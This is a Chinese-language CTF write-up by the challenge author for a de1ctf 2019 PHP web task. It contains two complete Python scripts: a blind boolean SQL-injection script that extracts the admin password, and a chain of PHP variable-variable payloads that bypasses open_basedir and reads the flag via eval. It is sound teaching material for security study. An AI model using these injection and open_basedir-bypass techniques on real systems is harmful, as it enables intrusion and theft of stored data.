这道题的最初版本是在 国赛2019半决赛Build环节
出的,赛后问了好几个师傅都说没遇到这题,然后打算在 de1ctf
把这道题重新放上,但是担心万一半决赛真的已经出过这题,那就很可能被喷,所以还是对最初版本进行小改动,让原来的 exp
失效。
后来 de1ctf
第二天放了这题,就有师傅说这题是 国赛2019西北赛区Web5
,不过还好做了小小改动。然后,据说这题效果不错。
- 题目国际化,中文改成英文。
- 限制注入用户名和密码的长度。
- 修改登录结果回显信息,方便注入判断。
题目页面类似一个网页沙盒。
在源代码 main.js
里找到一个提示,提供了 otp
的 python库
和 totp
的参数,方便写脚本。
同样是 main.js
里,可以找到用来生成 totp
的 key
。
出题人注:服务端时间与客户端时间相差大于 15秒
,需要先计算正确的 totp
才能调用 shell.php
。
查看 usage.md
可以看到命令用法, login
存在注入,没有过滤,用户名和密码长度限制 100
。
爆破密码脚本:
import requests
import urllib
import string
import pyotp
url = 'http://127.0.0.1/shell.php?a=%s&totp=%s'
totp = pyotp.TOTP("GAXG24JTMZXGKZBU", digits=8, interval=5)
s = requests.session()
length = 0
left = 0x0
right = 0xff
while True:
mid = int((right - left) / 2 + left)
if mid == left:
length = mid
break
username = "'/**/or/**/if(length((select/**/password/**/from/**/users/**/limit/**/1))>=%d,1,0)#" % mid
password = "b"
payload = 'login %s %s' % (username, password)
payload = urllib.quote(payload)
payload = url % (payload, totp.now())
res = s.get(payload).text
if 'incorrect' in res:
left = mid
else:
right = mid
print(length)
real_password = ''
for i in range(1, length+1):
left = 0x20
right = 0x7e
while True:
mid = int((right - left) / 2 + left)
if mid == left:
real_password += chr(mid)
break
username = "'/**/or/**/if(ascii(substr((select/**/password/**/from/**/users/**/limit/**/1),%d,1))>=%d,1,0)#" % (i, mid)
password = "b"
payload = 'login %s %s' % (username, password)
payload = urllib.quote(payload)
payload = url % (payload, totp.now())
res = s.get(payload).text
if 'incorrect' in res:
left = mid
else:
right = mid
print(real_password)
if len(real_password) < i:
print('No.%d char not in range' % i)
break
得到密码:hint{G1ve_u_hi33en_C0mm3nd-sh0w_hiiintttt_23333}
密码里提示有个隐藏命令 sh0w_hiiintttt_23333
,可以得到提示 eval
在 launch
的时候被调用。
launch
前需要先用 targeting
设置,不过对输入有限制,这里可以 fuzz
一下,得知 code
限制 a-zA-Z0-9
,position限制 a-zA-Z0-9})$({_+-,.
,而且两者的长度也有限制。
这里需要用 php可变变量
构造和拼接 payload
。
构造用来 getflag
的 payload
,绕过 open_basedir
的限制,写个脚本就能 getflag
。
getflag
脚本:
import requests
import urllib
import string
import pyotp
url = 'http://127.0.0.1/shell.php?a=%s&totp=%s'
totp = pyotp.TOTP("GAXG24JTMZXGKZBU", digits=8, interval=5)
s = requests.session()
def login(password):
username = 'admin'
payload = 'login %s %s' % (username, password)
payload = urllib.quote(payload)
payload = url % (payload, totp.now())
s.get(payload)
def destruct():
payload = 'destruct'
payload = urllib.quote(payload)
payload = url % (payload, totp.now())
s.get(payload)
def targeting(code, position):
payload = 'targeting %s %s' % (code, position)
payload = urllib.quote(payload)
payload = url % (payload, totp.now())
s.get(payload)
def launch():
payload = 'launch'
payload = urllib.quote(payload)
payload = url % (payload, totp.now())
return s.get(payload).text
login('hint{G1ve_u_hi33en_C0mm3nd-sh0w_hiiintttt_23333}')
destruct()
targeting('a','chr')
targeting('b','{$a(46)}')
targeting('c','{$b}{$b}')
targeting('d','{$a(47)}')
targeting('e','js')
targeting('f','open_basedir')
targeting('g','chdir')
targeting('h','ini_set')
targeting('i','file_get_')
targeting('j','{$i}contents')
targeting('k','{$g($e)}')
targeting('l','{$h($f,$c)}')
targeting('m','{$g($c)}')
targeting('n','{$h($f,$d)}')
targeting('o','{$d}flag')
targeting('p','{$j($o)}')
targeting('q','printf')
targeting('r','{$q($p)}')
print(launch())
Flag:de1ctf{h3r3_y0uuur_g1fttt_0uT_0f_b0o0o0o0o0xx}